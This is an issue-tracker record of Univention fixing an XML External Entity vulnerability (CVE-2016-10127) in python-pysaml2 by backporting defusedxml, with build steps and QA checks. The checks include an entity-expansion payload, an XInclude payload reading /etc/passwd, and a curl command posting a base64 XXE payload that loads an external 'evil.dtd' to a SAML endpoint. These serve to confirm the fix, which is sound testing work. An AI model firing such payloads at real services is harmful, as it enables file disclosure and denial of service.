Univention Bugzilla – Bug 43393
python-pysaml2: XML External Entity issue (4.1)
Last modified: 2019-06-06 12:55:08 CEST
Created attachment 8362 [details] CVE-2016-10127_fix-xxe-in-xml-parsing.patch Upstream Debian Jessie package version 2.0.0-1+deb8u1 fixes this issue: Matias P. Brutti discovered that python-pysaml2, a Python implementation of the Security Assertion Markup Language 2.0, did not correctly sanitize the XML messages it handled. This allowed a remote attacker to perform XML External Entity attacks, leading to a wide range of exploits (CVE-2016-10127) In UCS 4.1 we have version 2.4.0-2.
*** Bug 43315 has been marked as a duplicate of this bug. ***
We need to cherry-pick https://packages.debian.org/de/jessie/python-defusedxml.
* repo_admin.py -U -d jessie -r 4.1-0-0 -s errata4.1-4 -p defusedxml Successful build Package: defusedxml Version: 0.4.1-2.1.201702142211 Branch: ucs_4.1-0 Scope: errata4.1-4 * repo_admin.py --cherrypick --release 4.1-0 \ --releasedest 4.1-0 --dest errata4.1-4 --package python-pysaml2 Package: python-pysaml2 Version: 2.4.0-2.4.201702142305 Branch: ucs_4.1-0 Scope: errata4.1-4 = /var/univention/buildsystem2/logs/ucs_4.1-0-0-errata4.1-4/python-pysaml2_2.4.0-2.4.201702142305.log.bz2 * Comparing the log file with the UCS 4.1-0 build looks ok. The 6 new test cases run successfully. * python-defusedxml has been added to the ucs_4.1-0-ucs4.1-4.txt trigger list as described in the Wiki (Errata-Updates). The package is now listed in buildsystem2/cd-contents/ucs_4.1-4_*.maintained * Advisories: defusedxml.yaml, python-pysaml2.yaml
OK: grep ElementTree $(dpkg -L python-pysaml2 | sort) 2>/dev/null | grep fromstring | grep -v defusedxml OK: >>> import saml2 >>> xml = '<?xml version="1.0"?>\n<!DOCTYPE lolz [\n<!ENTITY lol "lol">\n<!ELEMENT lolz (#PCDATA)>\n<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">\n]>\n<lolz>&lol1;</lolz>\n' >>> saml2.create_class_from_xml_string(None, xml) Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/usr/lib/python2.7/dist-packages/saml2/__init__.py", line 86, in create_class_from_xml_string tree = defusedxml.ElementTree.fromstring(xml_string) File "/usr/lib/python2.7/dist-packages/defusedxml/common.py", line 159, in fromstring parser.feed(text) File "/usr/lib/python2.7/xml/etree/ElementTree.py", line 1641, in feed self._parser.Parse(data, 0) File "/usr/lib/python2.7/dist-packages/defusedxml/ElementTree.py", line 95, in defused_entity_decl raise EntitiesForbidden(name, value, base, sysid, pubid, notation_name) defusedxml.common.EntitiesForbidden: EntitiesForbidden(name='lol', system_id=None, public_id=None) OK: not possible to get file contents with e.g.: <root xmlns:xi="http://www.w3.org/2001/XInclude">\n <xi:include href="/etc/passwd" parse="text" />\n</root> OK: SAML login and logout via UMC still works OK: ucs-test -s saml -E dangerous
Just for myself: urllib.quote('''<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % payload SYSTEM "http://localhost:8000/evil.dtd"> %payload;]>'''.encode('base64').strip()) curl -ik 'https://xen3.school.local/univention/saml/' -H 'Content-Type: application/x-www-form-urlencoded' --data 'SAMLResponse=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48IURPQ1RZUEUgcm9vdCBbIDwh%0ARU5USVRZICUgcGF5bG9hZCBTWVNURU0gImh0dHA6Ly9sb2NhbGhvc3Q6ODAwMC9ldmlsLmR0ZCI%2B%0AICVwYXlsb2FkO10%2B'
<http://errata.software-univention.de/ucs/4.1/398.html> <http://errata.software-univention.de/ucs/4.1/400.html>